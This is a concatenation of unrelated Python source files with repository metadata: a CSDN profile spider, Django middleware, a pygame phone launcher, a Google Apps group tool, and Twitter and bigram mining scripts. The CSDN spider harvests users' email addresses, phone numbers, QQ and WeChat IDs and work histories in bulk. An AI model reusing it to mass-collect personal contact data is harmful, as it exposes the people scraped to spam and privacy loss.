        field = json.loads(response.body)['result']
        item['field'] = [fi.get('name', 'null') for fi in field]
        yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getSkill'),
                      callback=self.parse_skill)

    def parse_skill(self, response):
        """Attach skills (or 'null' on service error), then chain to education."""
        item = response.meta['item']
        body = json.loads(response.body)
        if str(body['err']) == '0':
            skill = body['result']
            item['skill'] = [sk.get('skillname', 'null') for sk in skill]
        else:
            item['skill'] = 'null'
        yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getEduExp'),
                      callback=self.parse_edu)

    def parse_edu(self, response):
        """Attach formatted education history, then chain to work history."""
        item = response.meta['item']
        body = json.loads(response.body)
        if str(body['err']) == '0':
            edu = body['result']
            item['edu_experience'] = [ed.get('edustartdate', 'null') + ' ~ ' + ed.get('eduenddate', 'null')
                                      + ' @' + ed.get('schoolname', 'null') + ' <' + ed.get('majorstr', 'null') + '>' for ed in edu]
        else:
            item['edu_experience'] = 'null'
        yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getWorkExp'),
                      callback=self.parse_job)

    def parse_job(self, response):
        """Attach formatted work history, then chain to contact info."""
        item = response.meta['item']
        body = json.loads(response.body)
        if str(body['err']) == '0':
            job = body['result']
            item['job_experience'] = [jb.get('workbegindate', 'null') + ' ~ ' + jb.get('workenddate', 'null')
                                      + ' @' + jb.get('orgname', 'null') + ' <' + jb.get('job', 'null') + '|' + jb.get('workdesc', 'null') + '>' for jb in job]
        else:
            item['job_experience'] = 'null'
        yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getContact'),
                      callback=self.parse_contact)

    def parse_contact(self, response):
        """Attach e-mail/phone/QQ/wechat and yield the completed item."""
        item = response.meta['item']
        body = json.loads(response.body)
        if str(body['err']) == '0':
            contact = body['result']
            item['email'] = contact['pubemail']
            item['phone'] = contact['submobile']
            # type 70 -> QQ, type 110 -> wechat.
            for info in contact['contactinfo']:
                if int(info['type']) == 70:
                    item['qq'] = info['value']
                elif int(info['type']) == 110:
                    item['wechat'] = info['value']
                else:
                    item['qq'] = 'null'
                    item['wechat'] = 'null'
            # NOTE(review): this for/else always runs (the loop has no
            # break), so it overwrites any values set inside the loop --
            # confirm whether the defaults were meant to run only when
            # contactinfo is empty.
            else:
                item['qq'] = 'null'
                item['wechat'] = 'null'
        else:
            item['email'] = 'null'
            item['qq'] = 'null'
            item['wechat'] = 'null'
        yield item

    def post_param(self, usename, method_name):
        """Build the JSON POST body for the my.csdn.net 'uc' service."""
        post_data = {'params': {'username': '%s' % str(usename), 'method': '%s' % method_name}}
        return json.dumps(post_data) | {
"repo_name": "mazcheng/snippets",
"path": "spider/csdn/csdn/spiders/csdn_spider.py",
"copies": "1",
"size": "5623",
"license": "apache-2.0",
"hash": 6991924750987031000,
"line_mean": 34.5949367089,
"line_max": 139,
"alpha_frac": 0.6475191179,
"autogenerated": false,
"ratio": 2.838465421504291,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3985984539404291,
"avg_score": null,
"num_lines": null
} |
"""App specific middleware"""
# Django imports
from django.views.defaults import page_not_found
from django.http import HttpResponseNotFound, HttpResponseForbidden, HttpResponseServerError
from django.template import loader
# Sekizai imports
from sekizai.context import SekizaiContext as Context
# app imports
from oweb.exceptions import OWebException, OWebAccountAccessViolation, OWebParameterMissingException, OWebIllegalParameterException
class OWebExceptionMiddleware(object):
    """Translate OWeb-specific exceptions into HTTP error responses."""

    def process_exception(self, req, e):
        """Map an OWebException subclass to a 403/404/500 response.

        Returns None for non-OWeb exceptions so Django's default
        exception handling takes over.
        """
        if not isinstance(e, OWebException):
            return None
        # Unauthorized access to an account -> 403.
        if isinstance(e, OWebAccountAccessViolation):
            template = loader.get_template('oweb/403.html')
            return HttpResponseForbidden(template.render(Context()))
        # Missing or illegal parameter -> 500.
        # Which status code is right, if a parameter is missing? Going with 500.
        if isinstance(e, (OWebParameterMissingException,
                          OWebIllegalParameterException)):
            template = loader.get_template('oweb/500.html')
            return HttpResponseServerError(template.render(Context()))
        # Any other OWeb exception is handled with a 404.
        # NOTE(review): page_not_found() already returns a response object;
        # wrapping it in HttpResponseNotFound mirrors the original code --
        # confirm it renders as intended.
        return HttpResponseNotFound(
            page_not_found(req, template_name='oweb/404.html'))
| {
"repo_name": "Mischback/django-oweb",
"path": "oweb/middleware.py",
"copies": "1",
"size": "1486",
"license": "mit",
"hash": -6205983053936320000,
"line_mean": 40.2777777778,
"line_max": 131,
"alpha_frac": 0.6520861373,
"autogenerated": false,
"ratio": 4.747603833865814,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0020967243453011955,
"num_lines": 36
} |
import pygame, sys
from pygame.locals import *
import imp
class App():
    """Manages the phone's slide-down app bar: loading, opening, closing apps.

    Apps live in /home/pi/tyos/apps/<name>/<name>.py, must expose a ``Run``
    class, and are listed (in display order) in /home/pi/tyos/apps/order.txt.
    """

    def __init__(self, fona):
        # Interface to the FONA GSM module, handed to every app instance.
        self.fona = fona
        # Important variables and constants for the bar animation/state.
        self.open_apps = False   # bar is currently sliding open
        self.pixel = 0           # pixels the bar has moved so far
        self.SPEED = 2           # pixels moved per frame
        self.opened = False      # bar is fully open
        self.close_apps = False  # bar is currently sliding closed
        self.app_to_open = None  # index of the app that should be running
        self.opened_app = None   # index of the app currently running
        self.blit_logo = True    # whether app logos should be drawn
        # Setup default apps.
        self.get_app_order()
        self.load_logos()
        self.import_app()
        self.first_run = True    # next launch must call on_first_run()

    def import_app(self):
        """Import each listed app module and instantiate its Run class."""
        loaded = []
        self.app_objects = []
        # Load modules
        for name in self.app_order:
            loaded.append(imp.load_source(name + '.Run', '/home/pi/tyos/apps/' + name + '/' + name + '.py'))
        # Load objects
        for module in loaded:
            self.app_objects.append(module.Run(self.fona))

    def open_app(self):
        """Run the selected app, handling first-run setup, exit and switching."""
        if self.app_to_open is None:
            return
        self.blit_logo = False
        # (Re)initialize when launching for the first time or switching apps.
        if self.first_run or self.opened_app != self.app_to_open:
            self.opened_app = self.app_to_open
            self.app_objects[self.app_to_open].on_first_run()
            self.first_run = False
        self.app_objects[self.app_to_open].run_app()
        if self.app_objects[self.app_to_open].exit:
            self.app_objects[self.app_to_open].exit = False
            if self.app_objects[self.app_to_open].next_app != None:
                # App requested a switch to another app, by name.
                self.app_to_open = self.app_order.index(self.app_objects[self.app_to_open].next_app)
            else:
                # Return to the home screen.
                self.app_to_open = None
                self.blit_logo = True
                self.first_run = True

    def load_logos(self):
        """Load the first four apps' logos and park them above the screen."""
        logos = {'surfaces': [], 'rects': []}
        for i in range(0, 4):
            logos['surfaces'].append(pygame.image.load('/home/pi/tyos/apps/' + self.app_order[i] + '/' + self.app_order[i] + '.png'))
            logos['rects'].append(logos['surfaces'][i].get_rect())
        for i in range(0, 4):
            logos['rects'][i].centery = -50          # hidden; slides to y=50 when open
            logos['rects'][i].centerx = 40 + 80 * i  # four 80px-wide columns
        self.logos = logos

    def get_app_order(self):
        """Read order.txt to determine which apps are shown and in what order."""
        # 'with' guarantees the handle is closed (the original leaked it);
        # print(...) works as both Py2 statement and Py3 function call.
        with open('/home/pi/tyos/apps/order.txt', 'r') as order_file:
            order = order_file.readlines()
        if len(order) < 4:
            print('Not enough apps in storage!')
            pygame.quit()
            sys.exit()
        self.app_order = [line.rstrip() for line in order]

    def check(self, event):
        """Dispatch a pygame event; return whether the bar is sliding open."""
        if event.type == MOUSEBUTTONDOWN:
            # Check for events inside of app.
            if self.app_to_open != None:
                self.app_objects[self.app_to_open].get_events(event)
            # Touch near the top edge opens the app bar.
            if event.pos[1] < 31 and self.opened == False:
                self.open_apps = True
                self.close_apps = False
                self.opened = True
            # Touch below the bar closes it.
            if event.pos[1] > 131 and self.opened:
                self.open_apps = False
                self.close_apps = True
                self.opened = False
            # Touch on a logo (bar fully open: logos rest at y=50) opens an app.
            if self.opened and self.logos['rects'][0].centery == 50:
                if event.pos[0] < 80 and event.pos[1] < 100:
                    self.app_to_open = 0
                if event.pos[0] < 160 and event.pos[0] > 80 and event.pos[1] < 100:
                    self.app_to_open = 1
                if event.pos[0] < 240 and event.pos[0] > 160 and event.pos[1] < 100:
                    self.app_to_open = 2
                if event.pos[0] < 320 and event.pos[0] > 240 and event.pos[1] < 100:
                    self.app_to_open = 3
        return self.open_apps

    def _shift(self, surfaces, rects, reception, bat, delta):
        """Move every animated rect vertically by *delta* pixels."""
        for r in surfaces['rects']:
            r.y += delta
        for r in rects['rects']:
            r.height += delta
        for r in reception['rects']:
            r.y += delta
        for r in self.logos['rects']:
            r.y += delta
        bat['rects'].y += delta

    def open(self, update, surfaces, rects, reception, bat):
        """Advance the open/close animation of the app bar by one frame.

        Returns the (possibly modified) update flag and the four rect
        containers, all of which are mutated in place.
        """
        if self.open_apps:
            update = True
            self.pixel += self.SPEED
            self._shift(surfaces, rects, reception, bat, self.SPEED)
            if self.pixel == 100:  # fully open
                self.open_apps = False
                update = False
        if self.close_apps:
            update = True
            self.pixel -= self.SPEED
            self._shift(surfaces, rects, reception, bat, -self.SPEED)
            if self.pixel == 0:    # fully closed
                self.close_apps = False
                update = False
        return update, surfaces, rects, reception, bat
if __name__ == '__main__':
    # NOTE(review): App.__init__ requires a `fona` argument, so running this
    # module directly raises TypeError here -- presumably leftover test
    # scaffolding; confirm before relying on it.
    t = App()
| {
"repo_name": "spadgenske/TYOS",
"path": "src/apps.py",
"copies": "1",
"size": "5394",
"license": "mit",
"hash": 5761531692080604000,
"line_mean": 33.5769230769,
"line_max": 133,
"alpha_frac": 0.4959213941,
"autogenerated": false,
"ratio": 3.7641311933007677,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9707721740217672,
"avg_score": 0.01046616943661919,
"num_lines": 156
} |
#!/apps/python-2.7/bin/python
# -*- coding: utf-8 -*-
import os
import os.path
import glob
import sys
from apiclient.discovery import build
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client import tools
import argparse
import simplejson as json
import pprint
import codecs
import yaml
import re
from termcolor import colored
from const import *
from utils import *
# Google group attribute names handled by this tool (group-settings API
# fields plus 'aliases'); drives the dump/diff/apply operations below.
GROUP_PARAMS = ['name', 'description', 'aliases', 'allowExternalMembers',
                'allowGoogleCommunication',
                'allowWebPosting', 'archiveOnly', 'customReplyTo',
                'includeInGlobalAddressList', 'isArchived',
                'maxMessageBytes', 'membersCanPostAsTheGroup',
                'messageDisplayFont', 'messageModerationLevel',
                'primaryLanguage', 'replyTo',
                'sendMessageDenyNotification', 'showInGroupDirectory',
                'spamModerationLevel', 'whoCanContactOwner',
                'whoCanInvite', 'whoCanJoin', 'whoCanLeaveGroup',
                'whoCanPostMessage', 'whoCanViewGroup',
                'whoCanViewMembership']
class GaService(object):
    """Thin wrapper around the Google Admin SDK directory and
    group-settings API services, authorized from stored OAuth credentials.
    """

    def __init__(self, cred_path=CREDENTIALS_PATH):
        """Load credentials from *cred_path* and build the three services."""
        storage = Storage(cred_path)
        credentials = storage.get()
        if credentials is None or credentials.invalid:
            # Without valid credentials nothing else can work.
            sys.exit(1)
        http = httplib2.Http()
        http = credentials.authorize(http)
        sv1 = build('admin', 'directory_v1', http=http)
        sv2 = build('groupssettings', 'v1', http=http)
        self.service = {}
        self.service['group'] = sv1.groups()
        self.service['member'] = sv1.members()
        self.service['settings'] = sv2.groups()

    def group_sv(self):
        """Return the directory groups service."""
        return self.service['group']

    def member_sv(self):
        """Return the directory members service."""
        return self.service['member']

    def settings_sv(self):
        """Return the group-settings service."""
        return self.service['settings']

    def list_local_groups(self, domain, dir):
        """Build GaGroup objects from local YAML dumps for *domain* in *dir*."""
        groups = []
        for f in glob.glob("%s/*@%s.yml" % (dir, domain)):
            # File name (minus .yml) is the group's e-mail address.
            email = os.path.splitext(os.path.basename(f))[0]
            group_obj = GaGroup()
            group_obj.set_group_key(email)
            groups.append(group_obj)
        return groups

    def list_cloud_groups(self, domain):
        """Fetch every group in *domain* from the API, following pagination."""
        groups = []
        pageToken = None
        while True:
            params = {'domain': domain}
            if pageToken:
                params['pageToken'] = pageToken
            r = self.service['group'].list(**params).execute()
            # `in` replaces dict.has_key(), which is deprecated in
            # Python 2 and removed in Python 3; behavior is identical.
            if 'groups' in r:
                for group in r['groups']:
                    group_obj = GaGroup()
                    group_obj.set_group_key(group['email'])
                    groups.append(group_obj)
            if 'nextPageToken' in r:
                pageToken = r['nextPageToken']
            else:
                break
        return groups
class GaGroup(object):
    """One Google group: its local YAML representation and cloud (API) state.

    NOTE: this module is Python 2 code (print statements, dict.has_key,
    str.encode/decode usage).
    """

    def __init__(self):
        self.local_dir = '.'   # directory holding local YAML dumps
        self.local = {}        # settings loaded from the local YAML file
        self.cloud = {}        # settings fetched from the API
        # NOTE(review): this attribute shadows the group_key() method below
        # on every instance, making the method effectively unreachable --
        # confirm before removing either.
        self.group_key = None  # the group's e-mail address (primary key)

    def set_group_key(self, group_key):
        """Set the group's e-mail address."""
        self.group_key = group_key

    def set_local_dir(self, local_dir):
        """Set the directory where local YAML dumps live."""
        self.local_dir = local_dir

    def group_key(self):
        # Shadowed by the instance attribute of the same name; see __init__.
        return self.group_key

    def load_cloud(self, sv):
        """Populate self.cloud from the API: settings, members and aliases."""
        r = sv.settings_sv().get(groupUniqueId=self.group_key).execute()
        self.cloud = r
        # Split the membership into role buckets of e-mail addresses.
        members = self.load_cloud_member(sv)
        self.cloud['members'] = []
        self.cloud['owners'] = []
        self.cloud['managers'] = []
        for member in members:
            if member['role'] == 'MEMBER':
                self.cloud['members'].append(member['email'])
            elif member['role'] == 'MANAGER':
                self.cloud['managers'].append(member['email'])
            elif member['role'] == 'OWNER':
                self.cloud['owners'].append(member['email'])
        self.cloud['members'].sort()
        self.cloud['owners'].sort()
        self.cloud['managers'].sort()
        # Aliases come from the directory API, not the settings API.
        r = sv.group_sv().get(groupKey=self.group_key).execute()
        if r.has_key('aliases'):
            self.cloud['aliases'] = r['aliases']

    def load_cloud_member(self, sv):
        """Fetch the full member list from the API, following pagination."""
        members = []
        pageToken = None
        while True:
            params = { 'groupKey': self.group_key }
            if pageToken:
                params['pageToken'] = pageToken
            r = sv.member_sv().list(**params).execute()
            if r.has_key('members'):
                for member in r['members']:
                    members.append(member)
            if r.has_key('nextPageToken'):
                pageToken = r['nextPageToken']
            else:
                break
        return members

    def dump_data(self, data, stream):
        """Write *data* (a settings dict) to *stream* in the YAML dump format."""
        stream.write("email: %s\n" % data['email'])
        for key in GROUP_PARAMS:
            if data.has_key(key):
                if key in ['name', 'description']:
                    # Quoted; embedded double quotes are backslash-escaped.
                    stream.write("%s: \"%s\"\n" % (key, re.sub(r'"', '\\"', data[key]).encode('utf-8')))
                elif key in ['maxMessageBytes']:
                    # Numeric value: unquoted.
                    stream.write("%s: %s\n" % (key, data[key]))
                elif key in ['aliases']:
                    if len(data[key]):
                        stream.write("%s:\n" % key)
                        for val in data[key]:
                            stream.write("  - %s\n" % val)
                    else:
                        stream.write("%s: []\n" % key)
                else:
                    stream.write("%s: \"%s\"\n" % (key, data[key]))
        # Membership lists are always emitted, empty or not.
        if len(data['members']):
            stream.write("members:\n")
            for member in data['members']:
                stream.write("  - %s\n" % member)
        else:
            stream.write("members: []\n")
        if len(data['managers']):
            stream.write("managers:\n")
            for member in data['managers']:
                stream.write("  - %s\n" % member)
        else:
            stream.write("managers: []\n")
        if len(data['owners']):
            stream.write("owners:\n")
            for member in data['owners']:
                stream.write("  - %s\n" % member)
        else:
            stream.write("owners: []\n")

    def dump_cloud(self):
        """Print the cloud state to stdout in the YAML dump format."""
        self.dump_data(self.cloud, sys.stdout)

    def local_file(self):
        """Return the path of this group's local YAML dump file."""
        file = "%s/%s.yml" % (self.local_dir, self.group_key)
        return file

    def export(self):
        """Write the cloud state to the local YAML dump file."""
        f = open(self.local_file(), 'w')
        self.dump_data(self.cloud, f)
        f.close()

    def load_local(self):
        """Populate self.local from the local YAML dump, if it exists."""
        file = self.local_file()
        if os.path.exists(file):
            # NOTE(review): yaml.load without a Loader is unsafe on
            # untrusted input (prefer yaml.safe_load), and the file
            # handle is never closed -- confirm before changing.
            self.local = yaml.load(open(file).read().decode('utf-8'))
    def diff(self):
        """Print a colored local-vs-cloud diff of settings and membership."""
        if not self.local.has_key('name'):
            self.load_local()
        # Scalar settings: '-' lines (red) are cloud, '+' lines (green) local.
        for key in GROUP_PARAMS:
            if self.local.has_key(key) and self.cloud.has_key(key):
                if self.local[key] != self.cloud[key]:
                    print colored("-%s: %s (cloud)" % (key, self.cloud[key]), 'red')
                    print colored("+%s: %s (local)" % (key, self.local[key]), 'green')
            elif self.local.has_key(key):
                print colored("+%s: %s (local)" % (key, self.local[key]), 'green')
            elif self.cloud.has_key(key):
                print colored("-%s: %s (cloud)" % (key, self.cloud[key]), 'red')
        # Membership lists: show addresses present on only one side.
        for key in ['members', 'managers', 'owners']:
            only_cloud = [x for x in self.cloud[key] if x not in self.local[key]]
            only_local = [x for x in self.local[key] if x not in self.cloud[key]]
            if len(only_cloud) or len(only_local):
                print "%s:" % key
                for x in only_cloud:
                    print colored("- - %s (cloud)" % x, 'red')
                for x in only_local:
                    print colored("+ - %s (local)" % x, 'green')

    def apply(self, sv):
        """Push local settings that differ from the cloud via the API.

        Only plain settings are pushed; name, description, aliases and
        membership are excluded here.
        """
        if not self.local.has_key('name'):
            self.load_local()
        body = {}
        # NOTE(review): update_keys is assigned but never used.
        update_keys = []
        for key in GROUP_PARAMS:
            if key not in ['name', 'description', 'aliases']:
                if self.cloud[key] != self.local[key]:
                    body[key] = self.local[key]
        if len(body) > 0:
            r = sv.settings_sv().update(groupUniqueId=self.group_key, body=body).execute()
            print "updated"
        else:
            print "no changes"

    def csv(self):
        """Return this group's local data as one CSV row ('IU' command)."""
        if not self.local.has_key('name'):
            self.load_local()
        # Strip any trailing '[sateraito...' marker from the description.
        description = re.sub(r'\s*\[sateraito.*$', '', self.local['description'])
        return '"IU","%s","%s","%s","%s","%s"' % (self.local['email'],
                                                  self.local['name'],
                                                  ','.join(self.local['members']),
                                                  ','.join(self.local['owners']),
                                                  re.sub(r'"', '""', description))
def csv_header():
    """Return the CSV header row matching the columns emitted by csv()."""
    columns = ("command", "email", "name", "members", "owners", "comment")
    return ','.join('"%s"' % c for c in columns)
def main():
    """Command-line entry point.

    Resolves each target (a full group email, or a domain to enumerate)
    into group objects, then runs the requested operation on each:
    show / diff / export / apply / csv.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('operation',
                        choices=['show', 'diff', 'export', 'apply', 'csv'],
                        help='operation')  # fix: help text was 'operationo'
    parser.add_argument('targets', nargs='+', help='domain or email list')
    parser.add_argument('--dir', help='local data directory', default='.')
    parser.add_argument('--encoding',
                        choices=['utf-8', 'sjis'],
                        help='csv output encoding',
                        default='utf-8')
    args = parser.parse_args()
    sv = GaService()
    groups = []
    for target in args.targets:
        if target.find('@') >= 0:
            # A single group address was given.
            g = GaGroup()
            g.set_group_key(target)
            groups.append(g)
        elif args.operation == 'csv':
            # csv works from exported local files rather than the API.
            groups.extend(sv.list_local_groups(target, args.dir))
        else:
            groups.extend(sv.list_cloud_groups(target))
    if args.operation == 'csv':
        print(csv_header())
    for group in groups:
        group.set_local_dir(args.dir)
        if args.operation != 'csv':
            print(group.group_key)
            group.load_cloud(sv)
        if args.operation == 'show':
            group.dump_cloud()
        elif args.operation == 'export':
            group.export()
        elif args.operation == 'diff':
            group.diff()
        elif args.operation == 'apply':
            group.apply(sv)
        elif args.operation == 'csv':
            print(group.csv().encode(args.encoding))
if __name__ == '__main__':
main()
| {
"repo_name": "yteraoka/googleapps-directory-tools",
"path": "groupman.py",
"copies": "1",
"size": "10706",
"license": "apache-2.0",
"hash": 7967581683090992000,
"line_mean": 34.3333333333,
"line_max": 104,
"alpha_frac": 0.5077526621,
"autogenerated": false,
"ratio": 3.999252895031752,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9992247016947768,
"avg_score": 0.0029517080367968108,
"num_lines": 303
} |
## appsterdam twitter data
## usage: we open a csv file with names of companies or phenomenon that are
## of interest to the amsterdam tech community. these subjects are
## searched on twitter. the tweets will give us a new list of users and
## hashtags. these will be searched again and through a breadth first
## search we will come to an even larger graph. this graph is then stored
## with a date. this script needs to be rerun such that the graph is updated
## we also keep the messages in the tweets
## example calls:
## $ python mega_twitter_parser.py
## prerequisites:
## python 2.7.3
## nltk package
## numpy
## output : a csv file containing all the connections between users/hashtages
## a csv file containing the actual tweets
import os, sys; sys.path.insert(0, os.path.join("..", ".."))
from pattern.web import Twitter, hashtags
from pattern.db import Datasheet, pprint
import numpy as np
from nltk.corpus import stopwords
import nltk
from nltk.tokenize import word_tokenize, wordpunct_tokenize, sent_tokenize
from nltk.collocations import *
bigram_measures = nltk.collocations.BigramAssocMeasures()
trigram_measures = nltk.collocations.TrigramAssocMeasures()
import re
from collections import Counter
import sys
import itertools
import csv
import unicodedata
import time
from datetime import date
# Seed subjects to query on Twitter, one per line (read as byte strings).
twitter_subjects = np.genfromtxt('twitter_subjects.csv', skip_header=False, delimiter=',', dtype='|S')
try:
    # We store tweets in a Datasheet that can be saved as a text file (comma-separated).
    # In the first column, we'll store a unique ID for each tweet.
    # We only want to add the latest tweets, i.e., those we haven't previously encountered.
    # With an index on the first column we can quickly check if an ID already exists.
    # The index becomes important once more and more rows are added to the table (speed).
    table = Datasheet.load("current_tweets.csv")
    index = dict.fromkeys(table.columns[0], True)
except:
    # NOTE(review): bare except swallows every error (not just a missing
    # file), including KeyboardInterrupt; prefer "except Exception:".
    table = Datasheet()
    index = {}
engine = Twitter(language="en")
tweet_csv = []
# NOTE(review): this rebinding discards the Datasheet loaded above, so the
# previously collected tweets in current_tweets.csv are never reused.
table = []
for twitter_subject in twitter_subjects:
    # With cached=False, a live request is sent to Twitter,
    # so we get the latest results for the query instead of those in the local cache.
    for tweet in engine.search(twitter_subject, count=275, cached=False):
        # Create a unique ID based on the tweet content and author.
        # NOTE(review): tweet.values()[5] relies on dict ordering -- fragile;
        # verify which field this is meant to pick.
        new_line = '@'+tweet.author + ' , ' + tweet.description + ' , ' + str(tweet.values()[5]) + ' , ' + str(tweet.url)
        id = hash(tweet.author + tweet.description)
        # Only add the tweet to the table if it doesn't already contain this ID.
        if len(table) == 0 or id not in index:
            tweet_csv.append(new_line)
            # Fold to ASCII so downstream csv/graph tools don't choke on unicode.
            norm_descr = unicodedata.normalize('NFKD', tweet.description).encode('ascii','ignore')
            norm_author = unicodedata.normalize('NFKD', tweet.author).encode('ascii','ignore')
            table = table + ['@'+ str(norm_author) + ' ' + str(norm_descr)]
            index[id] = True
## this bit will save all the tweets with the date into a csv file with a date attached in the file name
str_today = 'tweets' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
f = open(str_today, "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
for x in xrange(0,len(tweet_csv)):
    # NOTE(review): tweet_csv[x] is a string, so [0]/[1]/[2] index its first
    # three CHARACTERS, not the author/description/url fields -- likely a bug.
    new_line = tweet_csv[x][0] + '' + tweet_csv[x][1] + '' + tweet_csv[x][2]
    new_line = unicodedata.normalize('NFKD', new_line).encode('ascii','ignore')
    new_line = str(new_line).translate(None, '.()\' ')
    c.writerow([new_line])
f.close()
# Extract @mentions/#hashtags per tweet and record co-occurrence bigrams.
bigram_table = Datasheet()
all_tokens = []
for row in table:
    tweet = str(row).lower()
    tokens = []
    # NOTE(review): word_tokenize(tweet) is recomputed on every access here;
    # tokenizing once outside the loop would be much faster.
    for i in range(0,len(word_tokenize(tweet))):
        if word_tokenize(tweet)[i] == '@':
            tokens.append( str('@' + word_tokenize(tweet)[i+1]) )
        if word_tokenize(tweet)[i] == '#':
            tokens.append( str('#' + word_tokenize(tweet)[i+1]) )
    new_bigrams = nltk.bigrams(tokens)
    for bigram in new_bigrams:
        bigram_table.append(bigram)
    for token in tokens:
        # NOTE(review): extend(tokens) adds the WHOLE token list once per
        # token (quadratic duplication); append(token) was probably intended.
        all_tokens.extend(tokens)
token_freq = nltk.FreqDist(all_tokens)
str_today = 'tweet_graph_' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
bigram_table.save(str_today)
# Breadth-first expansion: search again for every user/hashtag found above.
new_twitter_subjects = list(set(all_tokens))
another_table = Datasheet()
# save the original list of twitter users, we'll use this in cytoscape
spamWriter = csv.writer(open('original_twitter.csv', 'wb'), delimiter=' ', quotechar='|')
for i in list(set(all_tokens)):
    spamWriter.writerow([i, 1])
for twitter_subject in new_twitter_subjects:
    # With cached=False, a live request is sent to Twitter,
    # so we get the latest results for the query instead of those in the local cache.
    for tweet in engine.search(twitter_subject, count=275, cached=False):
        # Create a unique ID based on the tweet content and author.
        id = hash(tweet.author + tweet.description)
        # Only add the tweet to the another_table if it doesn't already contain this ID.
        if len(another_table) == 0 or id not in index:
            another_table.append([' @'+tweet.author + ' ' + tweet.description])
            index[id] = True
another_table.save("even_moretweets.txt", delimiter=" ")
print "Total results:", len(another_table)
# Second-pass token/bigram extraction over the expanded tweet set.
big_bigram_table = Datasheet()
big_all_tokens = []
for row in another_table:
    tweet = str(row).lower()
    tokens = []
    for i in range(0,len(word_tokenize(tweet))):
        if word_tokenize(tweet)[i] == '@':
            tokens.append( str('@' + word_tokenize(tweet)[i+1]) )
        if word_tokenize(tweet)[i] == '#':
            tokens.append( str('#' + word_tokenize(tweet)[i+1]) )
    new_bigrams = nltk.bigrams(tokens)
    for bigram in new_bigrams:
        big_bigram_table.append(bigram)
    for token in tokens:
        # NOTE(review): same extend-vs-append issue as above.
        big_all_tokens.extend(tokens)
token_freq = nltk.FreqDist(big_all_tokens)
# NOTE(review): str_today is computed here but the save on the next line
# uses a hard-coded filename, so this value is unused.
str_today = 'tweet_graph_' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
big_bigram_table.save("biggest_tweet_graph2.csv") | {
"repo_name": "InnoViz/innoviz-frontend",
"path": "app/data miner scripts/TWITTER GRAPH/twitter_miner.py",
"copies": "1",
"size": "6330",
"license": "mit",
"hash": -6059324430615256000,
"line_mean": 41.4899328859,
"line_max": 122,
"alpha_frac": 0.6551342812,
"autogenerated": false,
"ratio": 3.4383487235198262,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4593483004719826,
"avg_score": null,
"num_lines": null
} |
## appsterdam website data
## usage: call this script followed by a text file
## the script will then create a .csv file with all bigrams and their weight in the file
## the script is aimed at showing info from the appsterdam member profiles
## example calls:
## $ python getBigram.py example.txt
## $ python getBigram.py member_descripion
## prerequisites:
## python 2.7.3
## nltk package
## output : a csv file containing all the bigrams and the frequency
## a csv file containing the frequency of each word
import nltk
from nltk.tokenize import word_tokenize, wordpunct_tokenize, sent_tokenize
from nltk.collocations import *
bigram_measures = nltk.collocations.BigramAssocMeasures()
trigram_measures = nltk.collocations.TrigramAssocMeasures()
import re
from collections import Counter
import sys
import itertools
import csv
## dump all the text from a source in a text file
print sys.argv[1]
# NOTE(review): the handle is never closed; a with-statement would be safer.
f = open(sys.argv[1])
raw = f.read()
raw = raw.lower()
tokens = nltk.word_tokenize(raw)
# Keeps only tokens containing at least one letter (drops pure punctuation
# tokens; punctuation attached to a word is retained).
nonPunct = re.compile('.*[A-Za-z].*') ## remove punctuation
filtered = [w for w in tokens if nonPunct.match(w)] ## remove punctuation
tokens = filtered ## remove punctuation
# Mixed Dutch/English stopword list, hand-picked for these profiles.
stops = ['wij', 'zijn', 'do', 'a','the','i', 'and', 'an', 'am', 'aan', 'de', 'to', "\'", "it", "in", 'at', 'for', 'of', 'en', 'on', 'is', 'with', 'we', 'are', 'if', 'you', 'op'] ## define stopwords
corpus =[token for token in tokens if token not in stops]
tokens = corpus
text = nltk.Text(tokens)
# Frequency distribution over the filtered, lower-cased tokens.
fdist = nltk.FreqDist([w.lower() for w in text])
def typesOfUsers(fdist):
    """Print "word,count" lines for a fixed vocabulary of profile keywords.

    fdist: a frequency mapping (e.g. nltk.FreqDist) returning a count for
    any word; missing words must yield 0, as FreqDist and Counter do.
    Output order: languages, designer, business, other -- each in list order.
    """
    # Fix: collapsed four copy-pasted print loops into one. The duplicate
    # 'founder' in the business list is kept so the output is unchanged.
    categories = (
        # programming languages / platforms
        ['ruby', 'ios', 'c', 'javascript', 'html', 'android', 'python', 'rails', 'cocoa', 'php'],
        # design-oriented keywords
        ['ux', 'design', 'designer', 'creative', 'ui', 'social', 'media'],
        # business-oriented keywords
        ['consultant', 'consultancy', 'founder', 'startup', 'startups', 'founder', 'co-founder', 'investor', 'entrepreneur', 'manager'],
        # generic tech keywords
        ['mobile', 'software', 'app', 'iphone', 'ipad', 'web', 'android', 'geek', 'amsterdam'],
    )
    for words in categories:
        for w in words:
            print(w + "," + str(fdist[w]))
typesOfUsers(fdist)
def hashtagsToBigrams(hastags):  # method not done!!!
    """Print the 2-combinations object of the given hashtag collection, once per row.

    Marked unfinished by the original author. Intended input format:
        #amsterdamrs #iosdevcamp #mac
        #amsterdam #appsterdam
        ...
    Intended output: a list of all bigrams and how often they occur.
    """
    # Fix: the original looped over an undefined global name `hashtags`
    # (NameError); it must iterate the `hastags` parameter.
    for row in hastags:
        print(itertools.combinations(hastags, 2))
## this bit is for printing out the most frequent words
print "\n The most frequent words \n"
# NOTE(review): pairing keys()[:20] with values()[:20] relies on FreqDist
# keeping both in the same (frequency) order -- true for nltk's FreqDist.
